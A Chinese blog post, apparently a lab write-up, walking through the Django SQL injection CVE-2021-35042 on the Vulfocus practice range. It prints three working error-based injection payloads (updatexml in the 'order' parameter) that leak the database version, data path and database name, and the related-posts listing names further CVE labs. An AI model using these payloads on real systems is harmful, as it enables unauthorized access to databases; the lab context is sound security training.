首页 > 数据库 >Vulfocus靶场 | Django SQL注入(CVE-2021-35042)

Vulfocus靶场 | Django SQL注入(CVE-2021-35042)

时间:2022-08-20 22:56:11浏览次数:157  
标签:Vulfocus 23 0x7e Django vuln 2021 updatexml id select

漏洞复现

这题通关比较简单,但是django这个漏洞还挺出名的,之前在ctf上也遇到过相关的题目\

 

直接按照提示,进入了Django报错页面

 

flag就在里面,直接ctrl+F就能找到

 

 

爆数据库版本

order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@version)),1)%23

 

爆路径

order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@datadir)),1)%23

 

 

数据库名

order=vuln_collection.id);select updatexml(1,concat(0x7e,(select database())),1)%23

 

 

 

标签:Vulfocus,23,0x7e,Django,vuln,2021,updatexml,id,select
From: https://www.cnblogs.com/mlxwl/p/16608975.html

相关文章

  • Vulfocus靶场 | webmin 远程代码执行 (CVE-2019-15642)
    描述Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。Webmin1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码......
  • IDEA-2021.1.2版本的相关设置
    1.自动导包:File|Settings|Editor|General|AutoImport        2.忽略大小写设置:(去掉MathCase)          ......
  • Vulfocus靶场 | Druid 任意文件读取(CVE-2021-36749)
    漏洞原理由于用户指定HTTPInputSource没有做出限制,可以通过将文件URL传递给HTTPInputSource来绕过应用程序级别的限制。由于ApacheDruid默认情况下是缺乏授权......
  • Vulfocus靶场 | Metabase geojson任意文件读取漏洞(CVE-2021-41277)
    漏洞描述etabase是一个开源数据分析平台。在受影响的版本中,已发现自定义GeoJSON地图(admin->settings->maps->custommaps->addamap)支持和潜在的本地文件包含(包括环......
  • Vulfocus靶场 | GoCD 任意文件读取漏洞 (CVE-2021-43287)
    漏洞描述GoCD一款先进的持续集成和发布管理系统,由ThoughtWorks开发。(不要和Google的编程语言Go混淆了!)其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时......
  • django笔记
    注意:一定要使用pycharm专业版-------------------------------------------------------------------------django简介:M代表模型(Model): 负责业务对象和数据库的关系映射(O......
  • 基于django中间件的编程思想
    基于django中间件的编程思想在django中,中间件的形式全部写成了列表套字符串的形式MIDDLEWARE=['django.middleware.security.SecurityMiddleware','django.c......
  • django中的中间件
    1.什么是中间件中间件是django的门户,在请求响应进入进出django的时候,都需要先经过中间件,用来全局改变django的输入和输出。django中自带7个中间件,每个中间件都有其特定......
  • 信2105-3班张少阳20213904第八周java学习总结
    本周进一步深入学习了类以及接口的用法,区别以及类似点1.3接口的成员特点1)成员变量:只能是常量,默认修饰符publicstaticfinal2)构造方法接口没有构造方法,因为接口主要是......
  • django中配置apscheduler,并解决运行两次的问题
    创建了一个独立的app,准备把定时器执行的内容放在这里pythonmanage.pystartappcron_jobs 在应用目录下创建目录autotask1.创建task.py文件,写入要执行的内容#-*-......